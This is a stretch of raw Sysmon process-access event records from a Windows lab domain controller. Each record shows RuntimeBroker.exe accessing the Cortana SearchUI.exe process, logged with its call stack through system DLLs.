12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
